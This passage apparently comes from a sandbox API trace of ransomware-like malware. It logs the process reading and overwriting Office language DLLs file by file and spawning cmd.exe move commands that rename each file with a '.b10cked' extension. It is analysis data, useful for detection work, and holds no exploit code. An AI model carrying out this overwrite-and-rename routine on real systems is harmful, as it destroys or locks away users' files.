lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.930] CloseHandle (hObject=0x114) returned 1 [0172.931] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX") returned 0x3c [0172.932] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.933] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xac0, dwThreadId=0xa74)) returned 1 [0172.934] CloseHandle (hObject=0x1b4) returned 1 [0172.934] CloseHandle (hObject=0x114) returned 1 [0172.935] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.935] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.935] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.935] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.935] ReleaseMutex (hMutex=0xf8) returned 1 [0172.935] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.935] ReleaseMutex (hMutex=0xf8) returned 1 [0172.935] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.935] ReleaseMutex (hMutex=0xf8) returned 1 [0172.935] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.935] ReleaseMutex (hMutex=0xf8) returned 1 [0172.935] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.935] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.935] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22972478439) returned 1 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x6478 [0172.937] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6960 [0172.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6960 [0172.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.949] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x34af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x34af, lpOverlapped=0x0) returned 1 [0172.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.950] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x34af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x34af, lpOverlapped=0x0) returned 1 [0172.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x34b1 [0172.950] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x34af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x34af, lpOverlapped=0x0) returned 1 [0172.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x34b1 [0172.951] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x34af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x34af, lpOverlapped=0x0) returned 1 [0172.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0172.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISBRRES.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISBRRES.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0172.955] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6960 [0172.955] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.955] CloseHandle (hObject=0x114) returned 1 [0172.956] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX") returned 0x3c [0172.957] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.957] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xa60, dwThreadId=0xaf4)) returned 1 [0172.964] CloseHandle (hObject=0x1b4) returned 1 [0172.964] CloseHandle (hObject=0x114) returned 1 [0172.964] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.964] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.964] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.964] ReleaseMutex (hMutex=0xf8) returned 1 [0172.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.964] ReleaseMutex (hMutex=0xf8) returned 1 [0172.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.964] ReleaseMutex (hMutex=0xf8) returned 1 [0172.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.964] ReleaseMutex (hMutex=0xf8) returned 1 [0172.965] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22975417943) returned 1 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x73960 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x73478 [0172.966] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x73960 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x73960 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0173.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0173.078] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.174] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, 